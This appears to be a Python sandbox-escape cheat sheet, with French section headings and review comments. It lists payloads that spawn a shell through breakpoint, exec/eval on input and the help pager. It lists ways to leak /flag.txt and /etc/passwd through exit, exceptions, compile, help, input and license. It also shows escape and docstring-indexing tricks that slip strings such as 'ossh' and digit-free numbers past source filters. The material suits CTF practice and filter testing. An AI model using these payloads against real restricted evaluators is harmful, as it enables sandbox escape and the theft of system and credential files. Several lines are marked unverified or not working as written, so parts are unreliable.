Bon à savoir

# Builtins that hand over an interactive helper or move file content into an
# output channel. A restricted evaluator that leaves any of these names
# reachable exposes the file through the channel named in each group, so a
# sandbox review has to cover every one of them, not only exec/eval.
# help, license and exit are installed by the site module; an interpreter
# started with -S does not define them.

# Interactive helpers: the debugger, exec/eval on user input and the help pager
# all accept further commands once started.
breakpoint() # pdb -> import os; os.system("sh")
exec(input()) # import os; os.system("sh")
eval(input()) # __import__("os").system("sh")
help() # pager less -> !/bin/sh
help() # pager less -> :e/flag.txt
# The list holds every line of the file, the whole content and one line taken
# from a set; the set built from it has length 1 only when all of those strings
# are equal, i.e. when the file is a single line.
assert len(set( [ *open("/flag.txt"), open("/flag.txt").read(), set(open("/flag.txt")).pop() ] )) == 1
# to stderr
# exit() with a non-integer argument prints that argument to stderr.
exit(set(open("/flag.txt")))
exit([*open("/flag.txt")])
# "." is not valid source, so compile() raises SyntaxError attributed to the
# given filename. Presumably the error display then shows the matching line of
# that file -- confirm on the interpreter version in use.
compile(".","/flag.txt","exec")
# The file lines become the exception arguments and appear in the traceback.
raise Exception(*open("/flag.txt"))
# to stdout
# help() receives the first line of the file as a str; presumably the
# "no documentation found" message echoes it -- confirm.
help([*open("/etc/passwd")][0]) # 1, 2, 3
print(*open("/flag.txt"))
# Builds an anonymous class whose __init__ prints the file, then instantiates it.
type("", (), {"__init__": lambda s: print(open("flag.txt").read())})()
# NOTE(review): nothing is printed here; the bytes are visible only where the
# expression value is echoed back (e.g. an interactive prompt).
memoryview(open("flag.txt", "rb").read()).tobytes()
# to stdin (the file lines are passed as the input() prompt)
input([*open("/etc/passwd")])
# https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help-and-license
# _Printer__filenames is the name-mangled form of a private __filenames
# attribute; the statement overwrites it before calling license().
license._Printer__filenames = ['/flag.txt']; license()
# NOTE(review): as written, the inner `in` is a membership test that yields a
# bool, not an assignment, so this line does not change _Printer__filenames
# before license() runs -- verify against the linked reference.
[license() for _ in [license._Printer__filenames in [['/flag.txt']]]]

Créer des chars & strings

# Equivalent spellings of one string value. A filter that matches on the
# literal source text sees a different byte sequence for each line, so checks
# on submitted code have to run on the parsed or evaluated value instead.
# Plain literal
print("hello")
# hex escapes
print("\x68\x65\x6c\x6c\x6f")
# octal escapes
print("\150\145\154\154\157")
# unicode code points (4-digit \u and 8-digit \U forms)
print("\u0068\u0065\u006c\u006c\u006f")
print("\U00000068\U00000065\U0000006c\U0000006c\U0000006f")
# Builtins only: characters are picked out of the tuple docstring by index.
# NOTE(review): the indices depend on the exact docstring text of the running
# interpreter -- verify on the target version.
print(().__doc__[56] + ().__doc__[17] + ().__doc__[3] + ().__doc__[3] + ().__doc__[34])
# Same indices, joined with explicit __add__ calls instead of the + operator.
print(().__doc__[56].__add__(().__doc__[17].__add__(().__doc__[3].__add__(().__doc__[3].__add__(().__doc__[34])))))
# Each character is the difference of two code points: 111, 115, 115, 104.
# Unlike the lines above this one evaluates to "ossh", not "hello".
print(chr(ord('ʚ')-ord('ȫ'))+chr(ord('ř')-ord('æ'))+chr(ord('ř')-ord('æ'))+chr(ord('ȉ')-ord('ơ')))

Créer des digits

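# Ways to obtain an integer without writing a digit literal. A filter that only
# rejects digit characters in the source text does not see any of these, so
# numeric limits have to be checked on the evaluated value.
print(10)
# bool is a subclass of int, so ten True values sum to 10.
print(True + True + True + True + True + True + True + True + True + True)
# Each group is the chained comparison () == (() + ()) == (), which is True.
# The same form works with []; {} + {} raises TypeError, so dicts need the
# plain {} == {} comparison instead.
print((()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==()))
print(((()==())<<(()==())<<(()==())<<(()==()))|((()==())<<(()==()))) # ((1<<1<<1<<1) | (1<<1)) = 8 | 2 = 10
# len("Ellipsis") + len("()") = 8 + 2 = 10. Both operands go through len():
# adding str(()) directly to an int raises TypeError.
print(len(str(...))+len(str(())))
# These two print True, which compares equal to 1.
print([[]]>[])
print(not[]is[])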